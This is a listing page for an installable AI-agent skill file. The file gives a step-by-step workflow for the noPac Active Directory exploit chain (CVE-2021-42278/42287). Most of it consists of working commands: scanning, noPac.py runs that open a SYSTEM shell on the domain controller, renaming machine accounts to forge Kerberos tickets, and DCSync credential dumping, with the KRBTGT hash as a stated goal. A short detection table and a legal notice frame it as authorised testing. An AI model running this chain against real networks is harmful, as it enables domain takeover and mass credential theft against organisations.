exploiting-nopac-cve-2021-42278-42287

Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion) to escalate from standard domain user to Domain Admin in Active Directory environments.

4,032 stars

Best use case

exploiting-nopac-cve-2021-42278-42287 is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion) to escalate from standard domain user to Domain Admin in Active Directory environments.

Teams using exploiting-nopac-cve-2021-42278-42287 should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

  • You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

  • You only need a quick one-off answer and do not need a reusable workflow.
  • You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/exploiting-nopac-cve-2021-42278-42287/SKILL.md --create-dirs "https://raw.githubusercontent.com/mukul975/Anthropic-Cybersecurity-Skills/main/skills/exploiting-nopac-cve-2021-42278-42287/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/exploiting-nopac-cve-2021-42278-42287/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How exploiting-nopac-cve-2021-42278-42287 Compares

Feature / Agentexploiting-nopac-cve-2021-42278-42287Standard Approach
Platform SupportNot specifiedLimited / Varies
Context Awareness High Baseline
Installation ComplexityUnknownN/A

Frequently Asked Questions

What does this skill do?

Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion) to escalate from standard domain user to Domain Admin in Active Directory environments.

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

Related Guides

SKILL.md Source

# Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)


> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

## Overview

noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. The exploit was publicly released by cube0x0 and Ridter in December 2021.


## When to Use

- When performing authorized security testing that involves exploiting nopac cve 2021 42278 42287
- When analyzing malware samples or attack artifacts in a controlled environment
- When conducting red team exercises or penetration testing engagements
- When building detection capabilities based on offensive technique understanding

## Prerequisites

- Familiarity with red teaming concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities

## Objectives

- Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)
- Create or leverage a machine account with modified sAMAccountName
- Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller
- Use the DC ticket to perform DCSync and dump domain credentials
- Achieve Domain Admin access from a standard domain user account
- Document the complete exploitation chain with evidence

## MITRE ATT&CK Mapping

- **T1068** - Exploitation for Privilege Escalation
- **T1136.002** - Create Account: Domain Account
- **T1078.002** - Valid Accounts: Domain Accounts
- **T1558** - Steal or Forge Kerberos Tickets
- **T1003.006** - OS Credential Dumping: DCSync

## Workflow

### Phase 1: Vulnerability Scanning
1. Check if the domain is vulnerable using the noPac scanner:
   ```bash
   # Using cube0x0's noPac scanner
   python3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1

   # Using CrackMapExec module
   crackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac
   ```
2. Verify the MachineAccountQuota (default is 10, allows any user to join computers):
   ```bash
   # Check MachineAccountQuota via LDAP
   python3 -c "
   import ldap3
   server = ldap3.Server('10.10.10.1')
   conn = ldap3.Connection(server, 'domain.local\\user', 'Password123', auto_bind=True)
   conn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota'])
   print(conn.entries[0]['ms-DS-MachineAccountQuota'])
   "
   ```

### Phase 2: Exploitation with noPac Tool
1. Run the full noPac exploit chain:
   ```bash
   # Using cube0x0's noPac (gets a shell on the DC)
   python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
     -dc-host DC01 -shell --impersonate administrator -use-ldap

   # Using Ridter's noPac (alternative implementation)
   python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
     --impersonate administrator -dump
   ```
2. The exploit automatically:
   - Creates a new machine account (or uses an existing one)
   - Renames the machine account's sAMAccountName to match the DC (e.g., "DC01")
   - Requests a TGT for the spoofed account name
   - Restores the original sAMAccountName
   - Uses S4U2self to obtain a service ticket impersonating the target user
   - The KDC finds no account matching "DC01" and falls back to "DC01$" (the real DC)

### Phase 3: Post-Exploitation
1. With the obtained Domain Controller ticket, perform DCSync:
   ```bash
   # DCSync using secretsdump.py with the Kerberos ticket
   export KRB5CCNAME=administrator.ccache
   secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local

   # Or directly through the noPac shell
   # The shell runs as SYSTEM on the DC
   ```
2. Alternatively, obtain a semi-interactive shell:
   ```bash
   python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
     -dc-host DC01 -shell --impersonate administrator -use-ldap
   ```

### Phase 4: Manual Exploitation Steps
1. Create a machine account:
   ```bash
   addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'AttackPass123' \
     -dc-ip 10.10.10.1 domain.local/user:'Password123'
   ```
2. Clear the SPN and rename sAMAccountName:
   ```bash
   # Rename machine account sAMAccountName to DC name (without $)
   renameMachine.py -current-name 'ATTACKPC$' -new-name 'DC01' \
     -dc-ip 10.10.10.1 domain.local/user:'Password123'
   ```
3. Request a TGT for the spoofed name:
   ```bash
   getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'
   ```
4. Restore the original machine name:
   ```bash
   renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC$' \
     -dc-ip 10.10.10.1 domain.local/user:'Password123'
   ```
5. Use S4U2self for impersonation:
   ```bash
   export KRB5CCNAME=DC01.ccache
   getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \
     -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC$'
   ```

## Tools and Resources

| Tool | Purpose | Platform |
|------|---------|----------|
| noPac (cube0x0) | Automated scanner and exploiter | Python |
| noPac (Ridter) | Alternative exploit implementation | Python |
| Impacket | Kerberos ticket manipulation, DCSync | Python |
| CrackMapExec | Vulnerability scanning module | Python |
| Rubeus | Windows Kerberos ticket operations | Windows (.NET) |
| secretsdump.py | Post-exploitation credential dumping | Python |

## CVE Details

| CVE | Description | CVSS | Patch |
|-----|-------------|------|-------|
| CVE-2021-42278 | sAMAccountName spoofing (machine accounts) | 7.5 | KB5008102 |
| CVE-2021-42287 | KDC PAC confusion / privilege escalation | 7.5 | KB5008380 |

## Detection Signatures

| Indicator | Detection Method |
|-----------|-----------------|
| Machine account sAMAccountName change | Event 4742 (computer account changed) with sAMAccountName modification |
| New machine account creation | Event 4741 (computer object created) |
| TGT request for account without trailing $ | Kerberos audit log analysis |
| S4U2self requests from non-DC machine accounts | Event 4769 with unusual service ticket requests |
| Rapid sequence: create account, rename, request TGT | SIEM correlation rule for noPac attack pattern |

## Validation Criteria

- [ ] Domain scanned for noPac vulnerability
- [ ] MachineAccountQuota verified (default 10)
- [ ] Exploit executed successfully (shell or DCSync)
- [ ] Domain Admin privileges obtained from standard user
- [ ] DCSync performed to dump domain credentials
- [ ] KRBTGT hash obtained for persistence validation
- [ ] Attack chain documented with timestamps
- [ ] Patch status verified (KB5008380, KB5008602)

Related Skills

exploiting-zerologon-vulnerability-cve-2020-1472

4032
from mukul975/Anthropic-Cybersecurity-Skills

Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty.

exploiting-websocket-vulnerabilities

4032
from mukul975/Anthropic-Cybersecurity-Skills

Testing WebSocket implementations for authentication bypass, cross-site hijacking, injection attacks, and insecure message handling during authorized security assessments.

exploiting-vulnerabilities-with-metasploit-framework

4032
from mukul975/Anthropic-Cybersecurity-Skills

The Metasploit Framework is the world's most widely used penetration testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary modules, and 400 post-exploitation modules

exploiting-type-juggling-vulnerabilities

4032
from mukul975/Anthropic-Cybersecurity-Skills

Exploit PHP type juggling vulnerabilities caused by loose comparison operators to bypass authentication, circumvent hash verification, and manipulate application logic through type coercion attacks.

exploiting-template-injection-vulnerabilities

4032
from mukul975/Anthropic-Cybersecurity-Skills

Detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities across Jinja2, Twig, Freemarker, and other template engines to achieve remote code execution.

exploiting-sql-injection-with-sqlmap

4032
from mukul975/Anthropic-Cybersecurity-Skills

Detecting and exploiting SQL injection vulnerabilities using sqlmap to extract database contents during authorized penetration tests.

exploiting-sql-injection-vulnerabilities

4032
from mukul975/Anthropic-Cybersecurity-Skills

Identifies and exploits SQL injection vulnerabilities in web applications during authorized penetration tests using manual techniques and automated tools like sqlmap. The tester detects injection points through error-based, union-based, blind boolean, and time-based blind techniques across all major database engines (MySQL, PostgreSQL, MSSQL, Oracle) to demonstrate data extraction, authentication bypass, and potential remote code execution. Activates for requests involving SQL injection testing, SQLi exploitation, database security assessment, or injection vulnerability verification.

exploiting-smb-vulnerabilities-with-metasploit

4032
from mukul975/Anthropic-Cybersecurity-Skills

Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks.

exploiting-server-side-request-forgery

4032
from mukul975/Anthropic-Cybersecurity-Skills

Identifying and exploiting SSRF vulnerabilities to access internal services, cloud metadata, and restricted network resources during authorized penetration tests.

exploiting-race-condition-vulnerabilities

4032
from mukul975/Anthropic-Cybersecurity-Skills

Detect and exploit race condition vulnerabilities in web applications using Turbo Intruder's single-packet attack technique to bypass rate limits, duplicate transactions, and exploit time-of-check-to-time-of-use flaws.

exploiting-prototype-pollution-in-javascript

4032
from mukul975/Anthropic-Cybersecurity-Skills

Detect and exploit JavaScript prototype pollution vulnerabilities on both client-side and server-side applications to achieve XSS, RCE, and authentication bypass through property injection.

exploiting-oauth-misconfiguration

4032
from mukul975/Anthropic-Cybersecurity-Skills

Identifying and exploiting OAuth 2.0 and OpenID Connect misconfigurations including redirect URI manipulation, token leakage, and authorization code theft during security assessments.